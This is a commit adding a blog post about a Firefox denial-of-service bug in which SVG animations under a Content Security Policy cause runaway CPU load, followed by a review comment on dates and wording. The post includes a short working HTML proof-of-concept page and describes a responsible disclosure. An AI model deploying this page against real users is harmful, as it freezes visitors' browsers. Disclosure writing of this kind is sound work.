- commit: 1f42da613fda39bf117bfea821cbbe7ed5ccb8c5
- parent: ff1e3d8a815a451a1ee38e709032730805d45760
- Author: Tobias Bengfort <tobias.bengfort@posteo.de>
- Date: 2023-12-07 07:11
post on CSP DoS in Firefox
Diffstat
A | _content/posts/2023-12-06-csp-dos/index.md | 49 | +++++++++++++++++++++++++++++++++++++++++++++++++ |
1 files changed, 49 insertions, 0 deletions
diff --git a/_content/posts/2023-12-06-csp-dos/index.md b/_content/posts/2023-12-06-csp-dos/index.md
@@ -0,0 +1,49 @@ -1 1 --- -1 2 title: Denial of Service using Content Security Policies in Firefox -1 3 date: 2023-11-04 -1 4 tags: [code, security] -1 5 --- -1 6 -1 7 Content Security Policies (CSPs) instruct browsers to block all code -1 8 that has not explicitly been allowed. This is meant to limit the impact -1 9 of script injections. -1 10 -1 11 I found that using the SVG `<animate>` element in Firefox triggers that -1 12 blocking mechanism repeatedly, leading to high CPU load and ultimately -1 13 denial of service. The CPU load can be increased simply by adding more -1 14 elements. Here is a simple proof of concept: -1 15 -1 16 ```html -1 17 <!DOCTYPE html> -1 18 <html> -1 19 <head> -1 20 <meta charset="utf-8"> -1 21 <meta http-equiv="Content-Security-Policy" content="style-src 'self'"> -1 22 </head> -1 23 <body> -1 24 <svg width="50px" height="50px" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"> -1 25 <rect x="0" y="0" width="10" height="10"> -1 26 <animate attributeName="opacity" from="1" to="0" dur="1s" begin="0s" repeatCount="indefinite" /> -1 27 </rect> -1 28 </svg> -1 29 </body> -1 30 </html> -1 31 ``` -1 32 -1 33 I personally run into that problem all the time because I block unsafe inline -1 34 styles on all websites by default using my [xiMatrix -1 35 extension](https://addons.mozilla.org/en-US/firefox/addon/ximatrix/). -1 36 -1 37 I reported this issue to security@mozilla.org in August 2022. They responded -1 38 within a few days and told me that this issue had already been found a few -1 39 years prior and had a [public -1 40 ticket](https://bugzilla.mozilla.org/show_bug.cgi?id=1459872). Needless to say, -1 41 it has not been fixed yet. -1 42 -1 43 Chrome doesn't block SVG animations at all. I am not sure whether that is the -1 44 optimal approach. But denial of service if definitely not good. If they want to -1 45 block an animation, it should be blocked once and not on every frame. 
-1 46 -1 47 The irony here is that the exploitable system is one that was designed to -1 48 improve security. I want to recommend CSPs and I do, even though I know there -1 49 is this bug that is relatively easy to exploit in the wild.
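Review bot: the front-matter `date: 2023-11-04` disagrees with the directory name `_content/posts/2023-12-06-csp-dos/`, and also with the commit date of 2023-12-07; if the generator sorts or builds URLs from the front-matter date, the post will be filed a month earlier than the path suggests, so one of the two should be corrected. Two wording issues on the new lines: "But denial of service if definitely not good" (line 44) should read "is definitely not good", and the directive in the proof of concept is worth calling out explicitly in the text, since the paragraph before the snippet says only that Firefox "triggers that blocking mechanism" without naming it; a short clause such as "the `style-src 'self'` directive blocks the inline style the animation applies on every frame" next to the `<meta http-equiv="Content-Security-Policy" ...>` line would make it clear to readers why the policy is the trigger and why the load scales with the number of `<animate>` elements. Finally, the sentence "it has not been fixed yet" would be easier to verify later if it carried the date it was checked (the post is dated more than a year after the August 2022 report), since the linked Bugzilla ticket is the only reference.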